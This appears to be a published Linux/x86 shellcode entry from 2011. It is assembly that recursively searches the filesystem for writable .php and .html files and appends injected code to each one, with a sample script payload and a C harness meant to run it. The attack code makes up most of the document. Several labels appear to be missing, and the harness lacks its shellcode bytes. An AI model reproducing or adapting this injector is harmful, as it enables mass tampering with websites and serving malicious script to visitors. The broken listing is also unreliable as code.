Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)











; Title : Linux/x86 Search php,html writable files and add your code.
; Date  : 2011-10-24 
; Author: rigan - imrigan [sobachka ]
; Size  : 380 bytes + your code.
; Note  : This shellcode writes down your code in the end of 
;         found files. Your code will be added only .html and .php 
;         files. Search for files is carried out recursively.  



section .text
global _start
;                               main                                   ;
              ; chdir("/")  
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2f
                mov ebx, esp
                mov al, 12
                int 0x80
                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e
                jmp SHORT .exit

                jmp SHORT search      

                call .jmp_search
              ; exit(0)   
                xor eax, eax
                xor ebx, ebx
                mov al, 1
                int 0x80

;                               inject                                 ;
               ; open("file", O_WRONLY)
                xor eax, eax
                mov ebx, edi
                xor ecx, ecx
                mov cl, 2
                mov al, 5
                int 0x80
              ; lseek(fd, 0, SEEK_END)
                xor ebx, ebx
                mov ebx, eax
                xor ecx, ecx
                xor eax, eax
                mov dl, 2
                mov al, 19
                int 0x80
              ; write(fd, your_code, sizeof(your_code))  
                xor eax, eax
                mov ecx, esi
                mov dl, 43   ; <- TO CHANGE THE SIZE HERE.
                mov al, 4
                int 0x80 

              ; close(fd)
                xor eax, eax
                xor ebx, ebx
                mov al, 6
                int 0x80 
;                               substr                                 ;
                xor eax, eax
                xor ebx, ebx
                xor ecx, ecx

                inc edx
              ; edi contains the filename address
              ; esi contains the substring address 
                mov BYTE bl, [edi + edx] 
                test bl, bl 
                jz not_found
                cmp BYTE bl, [esi]        
                jne loop_1        

                mov BYTE al, [esi + ecx]
                mov BYTE bl, [edi + edx]
                test al, al
                jz found
                inc ecx
                inc edx
                cmp bl, al
                je loop_2
                jmp short not_found

                xor eax, eax
                mov al, 2
;                               search                                 ;
;This function recursively find all writable files. [php, html]
                push ebp
                mov ebp, esp
                mov al, 250
                sub esp, eax
              ; open(".", O_WRONLY)
                xor eax, eax
                xor ecx, ecx
                lea ebx, [ebp + 8]
                mov al, 5
                int 0x80
                test eax, eax
                js .old_dirent
                mov [ebp + 12], eax    

              ; readdir(fd, struct old_linux_dirent *dirp, NULL)
                mov esi, [ebp + 12]
                mov ebx, esi
                xor eax, eax
                xor ecx, ecx
                lea ecx, [esp + 100]
                mov al, 89
                int 0x80
                test eax, eax
                jnz .l1

              ; closedir(fd)
                xor eax, eax
                xor ebx, ebx
                mov ebx, esi
                mov al, 6
                int 0x80

              ; chdir("..")
                xor eax, eax
                push eax
                push WORD 0x2e2e
                mov ebx, esp
                mov al, 12
                int 0x80


                lea edx, [esp + 110]
                cmp DWORD [edx], 0x636f7270   ; If the /proc filesystem detected...
                je .while                     ; dir
                cmp BYTE [edx], 0x2e
                jne .l2
                jmp  .while

              ; lstat(const char *file, struct stat *buf)
                mov ebx, edx
                mov ecx, esp
                xor eax, eax
                mov al, 196
                int 0x80 
                mov cx, 61439
                mov bx, 40959
                inc ecx   
                inc ebx
                mov eax, [esp + 16]
                and ax, cx
                cmp ax, bx
                jne .l3
                jmp .while

                xor eax, eax
                push eax
                sub esp, BYTE 0x1
                mov BYTE [esp], 0x2e
              ; chdir("file")
                mov ebx, edx
                mov al, 12
                int 0x80
                test eax, eax
                jne .l4
                call search
                jmp .while

              ; access("file", W_OK)       
                xor eax, eax
                mov ebx, edx
                xor ecx, ecx
                mov cl, 2
                mov al, 33
                int 0x80
                test eax, eax
                jz .check_html
                jmp .while

;                               check_html                             ;
                xor eax, eax
                push eax
                push DWORD 0x6c6d7468   ; 
                sub esp, BYTE 0x1       ; .html
                mov BYTE [esp], 0x2e    ;  
                mov esi, esp         
                mov edi, edx         
                call substr
                cmp BYTE al, 2
                je .do_inject

;                               check_php                              ;
                xor eax, eax
                push eax
                push DWORD 0x7068702e   ; .php
                mov esi, esp         
                call substr
                cmp BYTE al, 2
                je .do_inject
                jmp .while 

;                               do_inject                              ;
                jmp SHORT .your_code
                pop  esi    ; Get the address of your code into esi
                call inject
                jmp .while

;                               your_code                              ;
               call .write
; Here a place for your code. Its size should be allocated in the
; register dl. Look at the "inject" function.                                                               
db '<html><script>alert("pwn3d")<script></html>' ;<- You can change it.

; Dont't forget to change the size of your code!
              Below is presented the shellcode equivalent.

#include <stdio.h>

char shellcode[] = 
    // <html><script>alert("pwn3d")<script></html>
int main()
  printf("%d\n", strlen(shellcode));
  (*(void (*)()) shellcode)();
  return 0;